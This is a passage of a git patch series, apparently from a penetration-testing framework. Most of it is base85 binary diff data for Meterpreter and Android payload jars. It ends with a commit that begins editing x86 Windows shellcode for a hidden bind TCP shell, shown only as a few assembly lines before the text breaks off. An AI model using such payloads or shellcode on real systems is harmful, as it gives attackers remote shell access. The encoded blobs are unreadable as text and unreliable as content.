z!*5Xg#cV1+dqI<$ML;W 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 XZE3=CIsrJ%Av3_?G>GcV|MmU{+qYQd diff --git a/data/android/metstage.jar b/data/android/metstage.jar index 9a3d4d63152a411f0ef1545c9b25de6d6986e8c5..095c7b9a64a328b35850cdffccaaae6fcd8dca33 100644 GIT binary patch delta 1647 zcmV-#29Wv554#QyP)h>@6aWYa2mpm@XGD<>XC+(ka`AEj08mQ@2wpVAkVXIi07w7; z08mQ<1QY-W2nYa$YG*`|nj3$GmR)QVRTRh1%$GEUg4npsN)Ku(d)9 z)yh^#AWbL_GVD&%$0TP9JNh!&@|XGr|E!ZtyXy&Eh`L>A;7NEz}AIkNvGNB5T$qO4AI4f2Lc zbQAmq?tr`CZy;+#8Zf~oFac)43*cSwEw~D902#izzyR0_j)5|G5xfpQ2fu*p;5N7e z?t*`S7AG=53)l#Df`fnH2si;|!K>hH@ILqid;@*}SHW-KcW@ot1h;`=5Ve7Ruo(=2 zJlGE=!8CXloCasWIq(u#25*9Qz(?RS@RbqG8K#Qhns7^)Zc2b8XaOnEO3|FB0V_;9 z=m4Fd3#=2hc>rX=M$iZP!9&8oBgzGa{d5tBtRm48~(M`w{j}*_yy+=wW*t8}tM6tpwss#`}yko@j^e zXFKU4B@G9C{A>sMB#j<(54SVjx4PI9>i<2ld+ig7Z)tys$CUdwcA!l~rTb!W9>-C{ zVX_JuyA2h39D1K-pe;$`=-Y}_?prC$q;Iw0+6Q_K1$S(glScWNLWf`JF&;+W7+s>I z?pp@)VMP8Bi^b}fndpC`lQL#+LZ``uVP<-I6K13h^d{s;+jBA@am~+W=rwrHJl+3c z7iAKYDKmeOSwGo|>y}9i*L)^<#s=E2jmfSx{X0cp9qV1ju9w8#i1sM^N9(_Xq(Rb#UEd8yNE#z)f}{e;g)zY7G<6qj zzf=j_Qmz>Iq2q_SF(wzoJoVL^%Jz~M*ri-Gv}b>v+@upam2!n$^VEC)K1bL!Pd$Z_ z?VWW`=WO2(LOXN=KX-Jl5-e2n^kBWMx>OCF`P_bIam=%;)dIXQ&)tPn_E|gU2D$xq zXixa%T6iR^IQD#=QmakluE&RIzCTn8oBDRHw%u!Qi|n55&*nyhz;kRrPw6Hj4<=9T zYfXQ{10#9rT5GLG-ObJmnO_du@oy^=DU;ZnBNmT#tL+(9~3M zW<2;{rK*ONS}_dJ!D=eZAnQveFGHlqjvhOFfTSssrwXJ_74Rczn&ji7lsW$2wA+r~ zC*pgI^^i5YTz32tC5nxCAhqZPRfo0}gZY2Kc_*~1WiN0;rmjY~FIqQEL6csLmLA25 zLB(OW6{q0%)KWyvLgyK0fz_9^lH;L2=_P0JupQ2k<}A9^uu8ER)*NS7ZdYf#T6K<; znV?Lqvrf40WHs<=Vbqv{p{aDyePcdJc6~C~lIERAN9=B^QEZY^ECySuUY%~KIl*VhGw?sNqC;X6Fst)Ui!N%s`PlbmHau4U+D#gPf znqX4T+FlLGa&c&e)P;(RjOG%h3IG65O92rA6aW+e t2nYxOg=%L+UNppzlSl_X4uxuGM5-S$W8nn=0PqTvlm{;crUn22006oKAK(B0 delta 1790 zcmV@6aWYa2mn-Kyh4!W4zkP4t%)EJT-t6vFoON^0z7fjb4b1GWo45Y?W6QTQpL~D%{PiCmT{(a2 z_wv;?q8bsc&+X5W`2A`Uoub(O0QguU%0LdtMEIxMxb#8Z75CQ^qN@fJmFR#@Gzuoc zF>nIRg45tR@FF-57Qjp3J@5ti5&Q+Z;b#XJ2lK!OuYz~LC*W)F6SxD~5=4)IXTTY7 z9#p^*xBvoB2OHoe@D_jg5PS~42S0;fz;EDB@Hg|9BpLxlFbSr>JXisj!E4|OcoV!0 z-UlCn&%l@9I`|I!0&asl;2&UOO>>|J>;SvLKJW}U0ZxN?GhR2a)`qW_@Kd-bNi9r`w*?-Blc zTH-v;<4e(2V(X~W2$wQF!KFe^^PE#WPX!|;xooE?o_{QLthB_XMn#@a2OSZ49p&>R zXg^<*6b*CPK_`FtyeiG|HEE**d=27xEc{LLeB=8JM(pC!6f!|2z6J&z;x&!?tDwD?S65n%+us_B2 zj`j$7RtDLpq(L=122|| z)iLFvZQbya#Qx42-X57|jg;c$+p%Vzl|qbzsNSFv$6)aJmf*!nu(@;e8uJL-G48pG zd4^+I zm+zoD{AG_1z1~OJWzo; zKD#FD5;dP$iQ@N$C2HIyY?hFHE#sN&6=My=A>)5-p^ANK;Td4<-J}k$*a7LIuIEN$ zBu$VsMe-EtTq3zN0ZOElO0bpYsjp;vmB4o^g|hEOju#asm|TyFG}vgW*&9{gt`x$^ zUUCXEPUHl&fL)6;@c(_zvTKq0OBK6%$-PjpJ8yWGRP8V<<;uZ*(h-A)gq-gn~u6wK27WW$$He%w|leg zUVARKS8Z>pFz)+R$M%YpX)*F(iqv_(X>`|Ek$Ud8HlproX*jZ8c4{o=B4u05Cl^+n za&)f^QMumIX3{OT@w!{(p0~C%1K3IRL!YHVhBR|;mSC8Ck;S8$cBTK8LSi`KD zOkSE;SD$_H)De>ANS-T^Hdn%rq*omZ5} zPDxVagYxvcLXSxYpT=uztNPU8$H$HIw4xR>Zz%diW?GT=$-5P4Z_gNp>^FZ$$E19R zLc@luYKPjprM(%FHECu*>P_>n;4ADSFH6cRFRQO7B>CNhCVh~k<{6{)9oIO&viD-+ z469J{9II0EEUQuTJgZalOsiPJCwt%KIzUP$?_slJ0dXe(W3vYUwdWVv delta 86 zcmdnXx0jDEz?+#xgn@&DgCQhokJCiHbk*6Pi#`@HG6ZRF2yob$>1;m;BkIfzc&@~un diff --git a/data/meterpreter/ext_server_stdapi.jar b/data/meterpreter/ext_server_stdapi.jar index bef5cee0140fd78c4db9c9ac32eb29b3d7778bc5..b6a01cac095c0f8e799987555ea70dea3ae1b18e 100644 GIT binary patch delta 174 zcmV;f08#(`t^)q90+2NX8;47DkvT7apwL|vH)6q+TN#>>2HPY|(vP>dwTNyW^FH%t zN_6%?G3gs|wBF@v1(_6w&NfD$&2#2E$nNX?A|`!!rnUc;X(SFjBgAAdSXh!$6kOG|C;oj4d2MLy cqWT(ANbv@fK>-@G3<2-@G3<2d9 Date: Mon, 10 Mar 2014 12:13:10 +0100 Subject: [PATCH 045/853] Changed cmp eax by inc eax. Saved one byte --- .../x86/src/block/block_hidden_bind_tcp.asm | 5 ++-- .../singles/windows/shell_hidden_bind_tcp.rb | 25 +++++++++---------- 2 files changed, 15 insertions(+), 15 deletions(-) diff --git a/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm index fa8f31681a..3b708b9c48 100644 --- a/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm +++ b/external/source/shellcode/windows/x86/src/block/block_hidden_bind_tcp.asm @@ -80,8 +80,9 @@ wsaaccept: push edi ; socket descriptor push 0x33BEAC94 ; hash( "ws2_32.dll", "wsaaccept" ) call ebp ; wsaaccept( s, 0, 0, &fnCondition, 0) - cmp eax, -1 ; 